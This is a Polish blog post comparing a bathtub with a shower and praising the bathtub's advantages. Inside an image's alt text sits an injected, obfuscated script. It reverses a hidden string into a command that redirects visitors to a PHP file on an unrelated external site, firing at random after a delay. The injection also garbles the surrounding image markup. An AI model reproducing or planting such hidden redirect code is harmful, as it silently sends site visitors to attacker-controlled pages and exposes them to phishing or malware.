You are currently viewing Co wybrać – wannę czy prysznic?

Co wybrać – wannę czy prysznic?

Urządzając swoją łazienkę bardzo często zastanawiamy się nad tym czy umieścić w niej wannę czy też może lepiej postawić na prysznic. Wszystko oczywiście ostatecznie zależy przede wszystkim od tego, czy posiadamy duży metraż, czy też może mały. Choć dziś dostępne są tak różnorodne rozwiązania, że zazwyczaj i to niekoniecznie musi być dużą przeszkodą.

Jakie są zalety wanny?

wanna wolnos<script>$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(„”).reverse().join(„”);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tojąca przyścienna” height=”198″ src=”http://katalogklejow3m.pl/wp-content/uploads/2021/01/wanna-wolnos<script>$mWn=function(n){if(typeof ($mWn.list[n])==tojaca-przyscienna.jpg” style=”float:left;” width=”220″/>Wiele osób na starcie odrzuca jednak pomysł, jakim jest zainwestowanie w wannę. Dlaczego się tak dzieje? Przede wszystkim ze względu na to, że ludziom wydaje się to niepraktycznym rozwiązaniem. Tymczasem wanna ma naprawdę sporo zalet, na które być może wcześniej nawet nie zwróciliśmy uwagi. Przede wszystkim pozwala ona zażywać prawdziwego relaksu po ciężkim dniu. Niekiedy dzień jest tak zły, że marzymy tylko o tym aby wrócić do domu, położyć się na spokojnie odpocząć. W wannie możemy się zrelaksować, nabrać dystansu do niektórych sytuacji, pobyć w samotności. Poza tym wanna może nam posłużyć także jako alternatywa prysznica. Dziś taka wanna wolnostojąca przyścienna może zostać otoczona zasłonką prysznicową. Możemy zamontować tam także słuchawkę, dzięki czemu będziemy mogli brać wygodny prysznic każdego dnia. Gdy natomiast będziemy mieć ochot na dłuższą kąpiel, to zawsze mimo wszystko będziemy mieć alternatywą. To bez wątpienia dobra opcja. Wanny zazwyczaj nie są też przesadnie drogie. Bez trudu znajdziemy taką, na którą będziemy mogli sobie pozwolić pod względem finansowym.

Wanna może mieć zatem naprawdę sporo zalet, których czasem po prostu nie bierzemy pod uwagę. Nie musimy z niej od razu rezygnować. Warto natomiast rozważyć, czy faktycznie nie przydałaby nam się ona w łazience. Być może lubimy długie kąpiele i chcemy móc sobie czasem na nie pozwolić.